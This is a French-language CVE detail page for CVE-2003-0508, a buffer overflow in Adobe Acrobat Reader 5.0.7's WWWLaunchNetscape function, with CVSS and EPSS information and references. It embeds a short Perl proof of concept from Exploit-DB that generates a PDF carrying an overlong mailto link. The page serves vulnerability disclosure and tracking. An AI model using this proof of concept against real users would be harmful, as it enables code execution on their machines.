CVE-2003-0508 : Détail

CVE-2003-0508

16.99%V4
Network
2003-07-04
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the WWWLaunchNetscape function of Adobe Acrobat Reader (acroread) 5.0.7 and earlier allows remote attackers to execute arbitrary code via a .pdf file with a long mailto link.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22846

Date de publication : 2003-06-30 22h00 +00:00
Auteur : Paul Szabo
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/8069/info An individual has reported that Adobe Acrobat Reader for Unix systems is vulnerable to a buffer overflow condition. The error is allegedly related to the processing of hyperlinks, in the function "WWWLaunchNetscape". The flaw is triggered only when Netscape is set as the browser to be used in the preferences (this is the default configuration). This vulnerability may be exploited through maliciously constructed PDF files. It should be noted that it is not confirmed that Acrobat Reader for Windows is not affected. Users of both versions should exhibit caution until there is a response from the vendor. 4.x versions of the reader are reportedly not prone to this issue. #!/usr/bin/perl -- # # Demo for acroread 5.0.7 on Debian Linux # print ' Writing TeX file ... '; # For acroread 5.0.5 use 248 Bs instead of 504 open P, '>attack.tex'; print P ' \documentclass[11pt]{letter} \usepackage{times} \usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref} \begin{document} \href{mailto:X',("B"x504).("A"x4),'} {\texttt{mailto:X("B"x504).("A"x4)}} \end{document} '; close P; # print ' Running pdflatex ... '; system 'pdflatex attack'; # #!#

Products Mentioned

Configuraton 0

Adobe>>Acrobat_reader >> Version To (including) 5.0.7

Références

http://marc.info/?l=bugtraq&m=105785749721291&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=105709569312583&w=2
Tags : mailing-list, x_refsource_BUGTRAQ